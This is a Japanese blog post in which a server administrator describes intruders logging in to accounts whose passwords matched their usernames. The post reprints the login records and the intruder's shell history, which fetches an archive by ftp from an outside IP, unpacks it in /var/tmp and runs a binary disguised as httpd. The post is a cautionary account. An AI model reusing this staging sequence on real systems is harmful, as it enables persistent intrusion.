Linuxサーバに、ユーザ名とパスワードが同じアカウントを作ってインターネットに接続しておくと、非常に危ない目にあうことがわかりました。ここ最近、何だか知らない人がこのサーバに不正ログインしているようなのです。
こんな事、自分には一生縁の無いことだと思っていたのに・・・
ちょっと、そのいきさつを書いておこうと思います。
以下は、不正ログインの記録です。
一番左の列に書いてあるのは、不正ログインに使用されたユーザIDです。
一番右の列に書いてあるホスト名 or IPアドレスは、不正ログインしてきたホストをあらわします。
——————————————————————-
yoshimur pts/4 Wed Sep 21 06:32 – 06:32 (00:00) 80.97.226.250
yoshimur pts/2 Wed Sep 21 06:29 – 07:08 (00:39) donald.eco.nihon-u.ac.jp
yoshimur pts/4 Wed Sep 21 05:31 – 05:36 (00:04) 80.97.226.250
yoshimur pts/3 Wed Sep 21 05:29 – 07:40 (02:11) 80.97.226.250
yoshimur pts/2 Wed Sep 21 05:26 – 06:05 (00:39) donald.eco.nihon-u.ac.jp
kouhei pts/2 Tue Sep 20 08:07 – 08:10 (00:03) 61-220-196-90.hinet-ip.hinet.net
kouhei pts/1 Tue Sep 20 08:00 – 08:49 (00:49) 210.219.251.50
garnet pts/1 Fri Sep 16 21:07 – down (02:26) acb17686.ipt.aol.com
garnet pts/1 Fri Sep 16 19:30 – 19:34 (00:03) 218.55.114.254
——————————————————————-
色々なホストから不正ログインされています。恐ろしい。
でも、自分にも落ち度があったことにも気がつきました。今回、不正ログインに使用されたアカウントは、いずれも自分が作成したものなのです。そこまではいいのですが、実はアカウントを作成した際、パスワードを考えるのが面倒くさかったので、ユーザIDと同じにしてしまっていたのです・・・。こんなことになるなんて全然思ってもみませんでした。今後は気をつけようと思います。
ちなみに、ユーザID:yoshimuraを使って不正ログインしてきた人が、このサーバで実行したコマンドの履歴があったのですが、このような内容でした。
——————————————————————-
cd /var/tmp
ps -aux
uname -a
ftp -v 210.177.79.220
tar zxvf mech.tgz
rm -rf mech.tgz
cd .a
./httpd
exit
——————————————————————-
どこかのFTPサーバから圧縮済みのファイルをダウンロードして、「/var/tmp/」に展開後、解凍して何かを実行したようです。
こんな変なことをする人がいるので、辞書に載っているような単語や、一般的な苗字・名前をユーザ名として使っていて、かつユーザ名と同じパスワードに設定しておくのは、めちゃくちゃ危ないです。
何が面白くて、こんなことするのでしょう?もうやめて欲しいなぁ・・・。
-
アーカイブ
- 2023年1月
- 2021年8月
- 2021年6月
- 2021年2月
- 2021年1月
- 2020年11月
- 2020年9月
- 2020年8月
- 2020年5月
- 2020年3月
- 2020年1月
- 2019年12月
- 2019年11月
- 2019年9月
- 2019年8月
- 2019年7月
- 2019年6月
- 2019年5月
- 2019年4月
- 2019年3月
- 2019年2月
- 2019年1月
- 2018年12月
- 2018年11月
- 2018年9月
- 2018年8月
- 2018年7月
- 2018年6月
- 2018年5月
- 2018年4月
- 2017年12月
- 2017年11月
- 2017年10月
- 2017年9月
- 2017年4月
- 2017年3月
- 2017年2月
- 2017年1月
- 2016年9月
- 2016年8月
- 2016年7月
- 2016年6月
- 2016年5月
- 2016年3月
- 2016年1月
- 2015年12月
- 2015年11月
- 2015年10月
- 2015年9月
- 2015年8月
- 2015年7月
- 2015年6月
- 2015年5月
- 2015年4月
- 2015年3月
- 2014年10月
- 2014年9月
- 2014年8月
- 2014年7月
- 2014年5月
- 2014年4月
- 2014年3月
- 2014年2月
- 2014年1月
- 2013年7月
- 2013年6月
- 2013年2月
- 2013年1月
- 2012年12月
- 2012年11月
- 2012年10月
- 2012年9月
- 2011年11月
- 2011年10月
- 2011年9月
- 2011年8月
- 2011年7月
- 2011年6月
- 2011年5月
- 2011年4月
- 2011年3月
- 2011年2月
- 2011年1月
- 2010年12月
- 2010年11月
- 2010年10月
- 2010年9月
- 2010年8月
- 2010年7月
- 2010年6月
- 2010年5月
- 2010年4月
- 2010年3月
- 2010年2月
- 2010年1月
- 2009年11月
- 2009年10月
- 2009年9月
- 2009年8月
- 2009年7月
- 2009年6月
- 2009年5月
- 2009年4月
- 2009年3月
- 2009年2月
- 2009年1月
- 2008年12月
- 2008年11月
- 2008年10月
- 2008年9月
- 2008年8月
- 2008年7月
- 2008年6月
- 2008年5月
- 2007年10月
- 2007年9月
- 2007年8月
- 2007年7月
- 2007年6月
- 2007年5月
- 2007年4月
- 2007年3月
- 2007年2月
- 2007年1月
- 2006年12月
- 2006年11月
- 2006年10月
- 2006年9月
- 2006年8月
- 2006年7月
- 2006年6月
- 2006年5月
- 2006年4月
- 2006年3月
- 2006年2月
- 2006年1月
- 2005年12月
- 2005年11月
- 2005年10月
- 2005年9月
- 2005年8月
- 2005年7月
- 2005年6月
- 2005年5月
- 2005年4月
- 2005年3月
- 2005年2月
- 2005年1月
- 2004年12月
- 2004年11月
- 2004年10月
-
メタ情報